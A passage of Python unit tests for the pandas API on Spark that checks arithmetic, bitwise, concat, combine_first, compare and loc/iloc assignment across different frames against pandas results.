[249.0, np.nan, 0.0, 0.88, np.nan, np.nan, np.nan, np.nan, np.nan, -np.inf]
+ [np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
index=pd.MultiIndex(
[
["cow", "falcon", "koala", "koalas", "lama"],
["length", "power", "speed", "weight"],
],
[
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 3, 3, 3, 4, 4, 4],
[0, 1, 2, 2, 3, 0, 0, 1, 2, 3, 0, 0, 3, 3, 0, 2, 3],
],
),
)
self.assert_eq((psser1 - psser2 / psser3).sort_index(), expected)
else:
assert_eq((psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index())
assert_eq((psser1 + psser2 * psser3).sort_index(), (pser1 + pser2 * pser3).sort_index())
def test_mod(self):
pser = pd.Series([100, None, -300, None, 500, -700])
pser_other = pd.Series([-150] * 6)
psser = ps.from_pandas(pser)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
def test_rmod(self):
pser = pd.Series([100, None, -300, None, 500, -700])
pser_other = pd.Series([-150] * 6)
psser = ps.from_pandas(pser)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
def test_getitem_boolean_series(self):
pdf1 = pd.DataFrame(
{"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
)
pdf2 = pd.DataFrame(
{"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
index=[0, 30, 10, 20, 50],
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1[pdf2.A > -3].sort_index(), psdf1[psdf2.A > -3].sort_index())
self.assert_eq(pdf1.A[pdf2.A > -3].sort_index(), psdf1.A[psdf2.A > -3].sort_index())
self.assert_eq(
(pdf1.A + 1)[pdf2.A > -3].sort_index(), (psdf1.A + 1)[psdf2.A > -3].sort_index()
)
def test_loc_getitem_boolean_series(self):
pdf1 = pd.DataFrame(
{"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
)
pdf2 = pd.DataFrame(
{"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
index=[20, 10, 30, 0, 50],
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.loc[pdf2.A > -3].sort_index(), psdf1.loc[psdf2.A > -3].sort_index())
self.assert_eq(pdf1.A.loc[pdf2.A > -3].sort_index(), psdf1.A.loc[psdf2.A > -3].sort_index())
self.assert_eq(
(pdf1.A + 1).loc[pdf2.A > -3].sort_index(), (psdf1.A + 1).loc[psdf2.A > -3].sort_index()
)
def test_bitwise(self):
pser1 = pd.Series([True, False, True, False, np.nan, np.nan, True, False, np.nan])
pser2 = pd.Series([True, False, False, True, True, False, np.nan, np.nan, np.nan])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
pser1 = pd.Series([True, False, np.nan], index=list("ABC"))
pser2 = pd.Series([False, True, np.nan], index=list("DEF"))
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
@unittest.skipIf(
not extension_object_dtypes_available, "pandas extension object dtypes are not available"
)
def test_bitwise_extension_dtype(self):
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=False)
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
pser1 = pd.Series(
[True, False, True, False, np.nan, np.nan, True, False, np.nan], dtype="boolean"
)
pser2 = pd.Series(
[True, False, False, True, True, False, np.nan, np.nan, np.nan], dtype="boolean"
)
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
assert_eq((psser1 | psser2).sort_index(), pser1 | pser2)
assert_eq((psser1 & psser2).sort_index(), pser1 & pser2)
pser1 = pd.Series([True, False, np.nan], index=list("ABC"), dtype="boolean")
pser2 = pd.Series([False, True, np.nan], index=list("DEF"), dtype="boolean")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
# a pandas bug?
# assert_eq((psser1 | psser2).sort_index(), pser1 | pser2)
# assert_eq((psser1 & psser2).sort_index(), pser1 & pser2)
assert_eq(
(psser1 | psser2).sort_index(),
pd.Series([True, None, None, None, True, None], index=list("ABCDEF"), dtype="boolean"),
)
assert_eq(
(psser1 & psser2).sort_index(),
pd.Series(
[None, False, None, False, None, None], index=list("ABCDEF"), dtype="boolean"
),
)
def test_concat_column_axis(self):
pdf1 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
pdf1.columns.names = ["AB"]
pdf2 = pd.DataFrame({"C": [1, 2, 3], "D": [4, 5, 6]}, index=[1, 3, 5])
pdf2.columns.names = ["CD"]
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
psdf3 = psdf1.copy()
psdf4 = psdf2.copy()
pdf3 = pdf1.copy()
pdf4 = pdf2.copy()
columns = pd.MultiIndex.from_tuples([("X", "A"), ("X", "B")], names=["X", "AB"])
pdf3.columns = columns
psdf3.columns = columns
columns = pd.MultiIndex.from_tuples([("X", "C"), ("X", "D")], names=["Y", "CD"])
pdf4.columns = columns
psdf4.columns = columns
pdf5 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
pdf6 = pd.DataFrame({"C": [1, 2, 3]}, index=[1, 3, 5])
psdf5 = ps.from_pandas(pdf5)
psdf6 = ps.from_pandas(pdf6)
ignore_indexes = [True, False]
joins = ["inner", "outer"]
objs = [
([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
# TODO: ([psdf1, psdf2.C], [pdf1, pdf2.C]),
([psdf1.A, psdf2], [pdf1.A, pdf2]),
([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
([psdf3[("X", "A")], psdf4[("X", "C")]], [pdf3[("X", "A")], pdf4[("X", "C")]]),
([psdf3, psdf4[("X", "C")]], [pdf3, pdf4[("X", "C")]]),
([psdf3[("X", "A")], psdf4], [pdf3[("X", "A")], pdf4]),
([psdf3, psdf4], [pdf3, pdf4]),
([psdf5, psdf6], [pdf5, pdf6]),
([psdf6, psdf5], [pdf6, pdf5]),
]
for ignore_index, join in product(ignore_indexes, joins):
for i, (psdfs, pdfs) in enumerate(objs):
with self.subTest(ignore_index=ignore_index, join=join, pdfs=pdfs, pair=i):
actual = ps.concat(psdfs, axis=1, ignore_index=ignore_index, join=join)
expected = pd.concat(pdfs, axis=1, ignore_index=ignore_index, join=join)
self.assert_eq(
repr(actual.sort_values(list(actual.columns)).reset_index(drop=True)),
repr(expected.sort_values(list(expected.columns)).reset_index(drop=True)),
)
def test_combine_first(self):
pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
)
with self.assertRaisesRegex(
TypeError, "`combine_first` only allows `Series` for parameter `other`"
):
psser1.combine_first(50)
psser1.name = ("X", "A")
psser2.name = ("Y", "B")
pser1.name = ("X", "A")
pser2.name = ("Y", "B")
self.assert_eq(
psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
)
# MultiIndex
midx1 = pd.MultiIndex(
[["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
[[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
)
midx2 = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
pser1 = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx1)
pser2 = pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx2)
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
)
# DataFrame
pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
psdf1 = ps.from_pandas(pdf1)
pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
psdf2 = ps.from_pandas(pdf2)
if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
else:
# pandas < 1.2.0 returns unexpected dtypes,
# please refer to https://github.com/pandas-dev/pandas/issues/28481 for details
expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
pdf1.columns = pd.MultiIndex.from_tuples([("A", "willow"), ("B", "pine")])
psdf1 = ps.from_pandas(pdf1)
pdf2.columns = pd.MultiIndex.from_tuples([("C", "oak"), ("B", "pine")])
psdf2 = ps.from_pandas(pdf2)
if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
else:
# pandas < 1.2.0 returns unexpected dtypes,
# please refer to https://github.com/pandas-dev/pandas/issues/28481 for details
expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
expected_pdf.columns = pd.MultiIndex.from_tuples(
[("A", "willow"), ("B", "pine"), ("C", "oak")]
)
self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
def test_insert(self):
#
# Basic DataFrame
#
pdf = pd.DataFrame([1, 2, 3])
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
psdf.insert(1, "y", psser)
pdf.insert(1, "y", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
#
# DataFrame with Index different from inserting Series'
#
pdf = pd.DataFrame([1, 2, 3], index=[10, 20, 30])
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
psdf.insert(1, "y", psser)
pdf.insert(1, "y", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
#
# DataFrame with Multi-index columns
#
pdf = pd.DataFrame({("x", "a"): [1, 2, 3]})
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
pdf = pd.DataFrame({("x", "a", "b"): [1, 2, 3]})
psdf = ps.from_pandas(pdf)
psdf.insert(0, "a", psser)
pdf.insert(0, "a", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf.insert(0, ("b", "c", ""), psser)
pdf.insert(0, ("b", "c", ""), pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_compare(self):
if LooseVersion(pd.__version__) >= LooseVersion("1.1"):
pser1 = pd.Series(["b", "c", np.nan, "g", np.nan])
pser2 = pd.Series(["a", "c", np.nan, np.nan, "h"])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
pser1.compare(pser2).sort_index(),
psser1.compare(psser2).sort_index(),
)
# `keep_shape=True`
self.assert_eq(
pser1.compare(pser2, keep_shape=True).sort_index(),
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True`
self.assert_eq(
pser1.compare(pser2, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True`
self.assert_eq(
pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
# MultiIndex
pser1.index = pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
)
pser2.index = pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
)
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
pser1.compare(pser2).sort_index(),
psser1.compare(psser2).sort_index(),
)
# `keep_shape=True` with MultiIndex
self.assert_eq(
pser1.compare(pser2, keep_shape=True).sort_index(),
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True` with MultiIndex
self.assert_eq(
pser1.compare(pser2, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True` with MultiIndex
self.assert_eq(
pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
else:
psser1 = ps.Series(["b", "c", np.nan, "g", np.nan])
psser2 = ps.Series(["a", "c", np.nan, np.nan, "h"])
expected = ps.DataFrame(
[["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
)
self.assert_eq(expected, psser1.compare(psser2).sort_index())
# `keep_shape=True`
expected = ps.DataFrame(
[["b", "a"], [None, None], [None, None], ["g", None], [None, "h"]],
index=[0, 1, 2, 3, 4],
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], ["c", "c"], [None, None], ["g", None], [None, "h"]],
index=[0, 1, 2, 3, 4],
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
# MultiIndex
psser1 = ps.Series(
["b", "c", np.nan, "g", np.nan],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
),
)
psser2 = ps.Series(
["a", "c", np.nan, np.nan, "h"],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
),
)
expected = ps.DataFrame(
[["b", "a"], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
columns=["self", "other"],
)
self.assert_eq(expected, psser1.compare(psser2).sort_index())
# `keep_shape=True`
expected = ps.DataFrame(
[["b", "a"], [None, None], [None, None], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
),
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], ["c", "c"], [None, None], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
),
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
# Different Index
with self.assertRaisesRegex(
ValueError, "Can only compare identically-labeled Series objects"
):
psser1 = ps.Series(
[1, 2, 3, 4, 5],
index=pd.Index([1, 2, 3, 4, 5]),
)
psser2 = ps.Series(
[2, 2, 3, 4, 1],
index=pd.Index([5, 4, 3, 2, 1]),
)
psser1.compare(psser2)
# Different MultiIndex
with self.assertRaisesRegex(
ValueError, "Can only compare identically-labeled Series objects"
):
psser1 = ps.Series(
[1, 2, 3, 4, 5],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
),
)
psser2 = ps.Series(
[2, 2, 3, 4, 1],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "a"), ("x", "k"), ("q", "l")]
),
)
psser1.compare(psser2)
def test_different_columns(self):
psdf1 = self.psdf1
psdf4 = self.psdf4
pdf1 = self.pdf1
pdf4 = self.pdf4
self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
# Multi-index columns
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf1.columns = columns
pdf1.columns = columns
columns = pd.MultiIndex.from_tuples([("z", "e"), ("z", "f")])
psdf4.columns = columns
pdf4.columns = columns
self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
def test_assignment_series(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf["a"] = self.psdf2.a
pdf["a"] = self.pdf2.a
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf["a"] = self.psdf2.b
pdf["a"] = self.pdf2.b
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf["c"] = self.psdf2.a
pdf["c"] = self.pdf2.a
self.assert_eq(psdf.sort_index(), pdf.sort_index())
# Multi-index columns
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf.columns = columns
pdf.columns = columns
psdf[("y", "c")] = self.psdf2.a
pdf[("y", "c")] = self.pdf2.a
self.assert_eq(psdf.sort_index(), pdf.sort_index())
pdf = pd.DataFrame({"a": [1, 2, 3], "Koalas": [0, 1, 2]}).set_index("Koalas", drop=False)
psdf = ps.from_pandas(pdf)
psdf.index.name = None
psdf["NEW"] = ps.Series([100, 200, 300])
pdf.index.name = None
pdf["NEW"] = pd.Series([100, 200, 300])
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_frame(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf[["a", "b"]] = self.psdf1
pdf[["a", "b"]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
# 'c' does not exist in `psdf`.
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf[["b", "c"]] = self.psdf1
pdf[["b", "c"]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
# 'c' and 'd' do not exist in `psdf`.
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf[["c", "d"]] = self.psdf1
pdf[["c", "d"]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
# Multi-index columns
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf.columns = columns
pdf.columns = columns
psdf[[("y", "c"), ("z", "d")]] = self.psdf1
pdf[[("y", "c"), ("z", "d")]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf1 = ps.from_pandas(self.pdf1)
pdf1 = self.pdf1
psdf1.columns = columns
pdf1.columns = columns
psdf[["c", "d"]] = psdf1
pdf[["c", "d"]] = pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_series_chain(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf["a"] = self.psdf1.a
pdf["a"] = self.pdf1.a
psdf["a"] = self.psdf2.b
pdf["a"] = self.pdf2.b
psdf["d"] = self.psdf3.c
pdf["d"] = self.pdf3.c
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_frame_chain(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf[["a", "b"]] = self.psdf1
pdf[["a", "b"]] = self.pdf1
psdf[["e", "f"]] = self.psdf3
pdf[["e", "f"]] = self.pdf3
psdf[["b", "c"]] = self.psdf2
pdf[["b", "c"]] = self.pdf2
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_multi_index_arithmetic(self):
psdf5 = self.psdf5
psdf6 = self.psdf6
pdf5 = self.pdf5
pdf6 = self.pdf6
# Series
self.assert_eq((psdf5.c - psdf6.e).sort_index(), (pdf5.c - pdf6.e).sort_index())
self.assert_eq((psdf5["c"] / psdf6["e"]).sort_index(), (pdf5["c"] / pdf6["e"]).sort_index())
# DataFrame
self.assert_eq((psdf5 + psdf6).sort_index(), (pdf5 + pdf6).sort_index(), almost=True)
def test_multi_index_assignment_series(self):
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf["x"] = self.psdf6.e
pdf["x"] = self.pdf6.e
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf["e"] = self.psdf6.e
pdf["e"] = self.pdf6.e
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf["c"] = self.psdf6.e
pdf["c"] = self.pdf6.e
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_multi_index_assignment_frame(self):
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf[["c"]] = self.psdf5
pdf[["c"]] = self.pdf5
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf[["x"]] = self.psdf5
pdf[["x"]] = self.pdf5
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf6)
pdf = self.pdf6
psdf[["x", "y"]] = self.psdf6
pdf[["x", "y"]] = self.pdf6
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_frame_loc_setitem(self):
pdf_orig = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf_orig = ps.DataFrame(pdf_orig)
pdf = pdf_orig.copy()
psdf = psdf_orig.copy()
pser1 = pdf.max_speed
pser2 = pdf.shield
psser1 = psdf.max_speed
psser2 = psdf.shield
another_psdf = ps.DataFrame(pdf_orig)
psdf.loc[["viper", "sidewinder"], ["shield"]] = -another_psdf.max_speed
pdf.loc[["viper", "sidewinder"], ["shield"]] = -pdf.max_speed
self.assert_eq(psdf, pdf)
self.assert_eq(psser1, pser1)
self.assert_eq(psser2, pser2)
pdf = pdf_orig.copy()
psdf = psdf_orig.copy()
pser1 = pdf.max_speed
pser2 = pdf.shield
psser1 = psdf.max_speed
psser2 = psdf.shield
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -psdf.max_speed
pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
self.assert_eq(psdf, pdf)
self.assert_eq(psser1, pser1)
self.assert_eq(psser2, pser2)
pdf = pdf_orig.copy()
psdf = psdf_orig.copy()
pser1 = pdf.max_speed
pser2 = pdf.shield
psser1 = psdf.max_speed
psser2 = psdf.shield
psdf.loc[another_psdf.max_speed < 5, ["shield"]] = -another_psdf.max_speed
pdf.loc[pdf.max_speed < 5, ["shield"]] = -pdf.max_speed
self.assert_eq(psdf, pdf)
self.assert_eq(psser1, pser1)
self.assert_eq(psser2, pser2)
def test_frame_iloc_setitem(self):
pdf = pd.DataFrame(
[[1, 2], [4, 5], [7, 8]],
index=["cobra", "viper", "sidewinder"],
columns=["max_speed", "shield"],
)
psdf = ps.DataFrame(pdf)
another_psdf = ps.DataFrame(pdf)
psdf.iloc[[0, 1, 2], 1] = -another_psdf.max_speed
pdf.iloc[[0, 1, 2], 1] = -pdf.max_speed
self.assert_eq(psdf, pdf)
with self.assertRaisesRegex(
ValueError,
"shape mismatch",
):
psdf.iloc[[1, 2], [1]] = -another_psdf.max_speed
psdf.iloc[[0, 1, 2], 1] = 10 * another_psdf.max_speed
pdf.iloc[[0, 1, 2], 1] = 10 * pdf.max_speed
self.assert_eq(psdf, pdf)
with self.assertRaisesRegex(ValueError, "shape mismatch"):
psdf.iloc[[0], 1] = 10 * another_psdf.max_speed
def test_series_loc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.loc[psser % 2 == 1] = -psser_another
pser.loc[pser % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser
pser.loc[pser_another % 2 == 1] = -pser
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = -psser_another
pser.loc[pser_another % 2 == 1] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[["viper", "sidewinder"]] = -psser_another
pser.loc[["viper", "sidewinder"]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
psser.loc[psser_another % 2 == 1] = 10
pser.loc[pser_another % 2 == 1] = 10
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
def test_series_iloc_setitem(self):
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
pser1 = pser + 1
psser1 = psser + 1
pser_another = pd.Series([1, 2, 3], index=["cobra", "viper", "sidewinder"])
psser_another = ps.from_pandas(pser_another)
psser.iloc[[0, 1, 2]] = -psser_another
pser.iloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser.iloc[[1, 2]] = -psser_another
psser.iloc[[0, 1, 2]] = 10 * psser_another
pser.iloc[[0, 1, 2]] = 10 * pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser.iloc[[0]] = 10 * psser_another
psser1.iloc[[0, 1, 2]] = -psser_another
pser1.iloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser1, pser1)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
"cannot set using a list-like indexer with a different length than the value",
):
psser1.iloc[[1, 2]] = -psser_another
pdf = pd.DataFrame({"x": [1, 2, 3], "y": [4, 5, 6]}, index=["cobra", "viper", "sidewinder"])
psdf = ps.from_pandas(pdf)
pser = pdf.x
psery = pdf.y
psser = psdf.x
pssery = psdf.y
piloc = pser.iloc
kiloc = psser.iloc
kiloc[[0, 1, 2]] = -psser_another
piloc[[0, 1, 2]] = -pser_another
self.assert_eq(psser, pser)
self.assert_eq(psdf, pdf)
self.assert_eq(pssery, psery)
with self.assertRaisesRegex(
ValueError,
